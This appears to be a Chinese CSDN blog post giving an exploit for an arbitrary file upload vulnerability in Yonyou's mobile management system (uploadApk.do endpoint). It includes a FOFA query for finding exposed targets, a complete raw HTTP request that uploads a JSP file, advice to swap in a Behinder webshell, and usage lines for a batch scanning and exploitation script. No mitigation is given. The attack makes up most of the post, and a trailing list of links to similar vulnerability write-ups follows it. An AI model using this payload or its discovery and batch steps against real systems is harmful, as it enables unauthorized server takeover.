用友移动管理系统任意文件上传漏洞

最新推荐文章于 2024-06-26 01:30:10 发布
最新推荐文章于 2024-06-26 01:30:10 发布
阅读量448 收藏 1
点赞数
分类专栏: 信息安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CommputerMac/article/details/133397426
版权

一、漏洞描述

用友移动管理系统 uploadApk.do 文件存在任意文件上传

二、fofa查询

body="../js/jslib/jquery.blockUI.js"

三、漏洞利用

poc

POST /maportal/appmanager/uploadApk.dopk_obj= HTTP/1.1
Host: ip:port
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=C4E4D0BD20C3CC266B9091E656594B45.server; JSESSIONID=651D328AF33591493FB628C0A1E3BF06.server
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Length: 226

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="hacker.jsp"
Content-Type: application/msword

This website is vulnerable

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

返回如下,则文件上传成功

然后访问 http://ip:port/maupload/apk/hacker.jsp 返回如下

将上传内容换成木马即可,例如使用冰蝎马连接

四、批量检测与利用

单个检测

 python .\uploadApk.py -u https://ip:port

批量检测

 python .\uploadApk.py -u filename

批量检测脚本 关注微信公众号 网络安全透视镜 回复 20230929 获取

为赋新词强说愁
关注
专栏目录
用友移动管理系统 任意文件上传漏洞复现
0xSec
08-12 2336
用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
用友移动管理系统存在任意文件上传漏洞 附POC
nnn2188185的博客
10-06 523
用友移动系统管理旧版本uploadApk接口存在任意文件上传,攻击者可在无需登录的情况下上传恶意文件,执行任意命令。
泛微移动管理平台E-mobile lang2sql接口任意文件上传漏洞
CommputerMac的博客
11-07 5062
e-mobile可满足企业日常管理中的绝大部分管理需求, 诸如市场销售、项目、采购、研发、客服、财务、人事、行政等;同时e-mobile可帮助企业实现面向不同用户量身定制的移动办公入口,包括企业员工、供应商、代理商、 合作伙伴、投资费以及终端客户等整个供应链条上的关系主体,满足为企业全方位的移动办公需求。泛微e-mobile,由高端OA泛微专业研发,是业内领先的移动OA系统,提供移动审批,移动考勤,移动报表,企业微信等丰富办公应用,支持多种平台运行,灵活易用安全性高。
漏洞复现】用友 UFIDA saveDoc.ajax 任意文件上传漏洞
最新发布
凝聚力安全团队
06-26 1348
用友 UFIDA saveDoc.ajax接口存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
用友移动管理系统 任意文件上传漏洞[2023-HW]
holyxp的博客
08-16 601
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
用友移动管理系统 任意文件上传
m0_46317063的博客
08-21 294
用友移动管理系统 任意文件上传漏洞[2023-HW 0DAY]
【1day】用友移动管理系统任意文件上传漏洞学习
记录并分享学习安全的知识点..
10-07 327
用友移动管理系统用友公司开发的一款移动办公解决方案,旨在帮助企业实现移动办公、移动审批、移动报销等业务流程的管理和处理。该系统提供了一系列移动应用和功能,方便员工随时随地处理工作事务,提高工作效率和响应速度。用友移动管理系统存在任意文件上传漏洞,攻击者通过上传恶意文件,从而在Web服务器上执行未经授权的操作。
【1day】用友移动管理系统任意文件读取漏洞学习
记录并分享学习安全的知识点..
10-07 328
用友移动管理系统用友公司开发的一款移动办公解决方案,旨在帮助企业实现移动办公、移动审批、移动报销等业务流程的管理和处理。该系统提供了一系列移动应用和功能,方便员工随时随地处理工作事务,提高工作效率和响应速度。用友移动管理系统存在任意文件读取漏洞,攻击者可以在未经授权的情况下读取系统上的任意文件。
用友移动管理系统 多处文件上传漏洞复现
0xSec
01-10 681
用友移动管理系统 /maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
用友移动管理系统 getApp SQL注入漏洞复现
0xSec
01-27 360
用友移动管理系统 getApp功能点未对用户的输入进行过滤,导致存在SQL注入漏洞,利用此漏洞攻击者可以获取数据库敏感信息及凭证,使系统处于极度不安全状态。
漏洞复现】泛微e-Mobile 移动管理平台文件上传漏洞
qq_34780861的博客
04-25 2437
泛微e-Mobile移动管理平台是一款由泛微软件开发的企业移动办公解决方案。它提供了一系列的功能和工具,使企业员工能够通过移动设备随时随地地进行办公和协作。泛微e-Mobile 移动管理平台存在任意文件上传漏洞
漏洞标题: 中国移动mas2.0平台系统漏洞
fengling132的专栏
05-10 2087
漏洞详情 披露状态: 2012-03-26: 细节已通知厂商并且等待厂商处理中 2012-03-26: 厂商已经确认,细节仅向厂商公开 2012-04-05: 细节向核心白帽子及相关领域专家公开 2012-04-15: 细节向普通白帽子公开 2012-04-25: 细节向见习白帽子公开 2012-05-10: 细节向公众公开 简要描述: MAS是中国移动的短信
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 2151
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
漏洞复现】用友-移动系统管理-uploadIcon-任意文件上传
知黑而守白
01-26 112
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。用友移动系统管理允许攻击者通过 uploadIcon 接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。
用友 ufida-nc 文件读取漏洞
qq_36334672的博客
02-05 772
用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取。
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-12 1019
漏洞复现-某友UFIDA NC系统某接口未授权访问漏洞,附带自己写的poc脚本
用友NC Cloud accept.jsp任意文件上传漏洞
CommputerMac的博客
11-08 493
NC Cloud是用友推出的大型企业数字化平台。用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用
0xSec
04-04 2389
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
用友DRP分销系统管理与配置指南
"用友DRP分销系统管理资料是一份详细阐述如何管理和操作用友ERP/U8网络分销套件的文档。这份资料包含了系统设置、常用操作、参数及设置、机构设置和基本档案等多个方面的内容,是针对系统管理员的重要参考资料。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值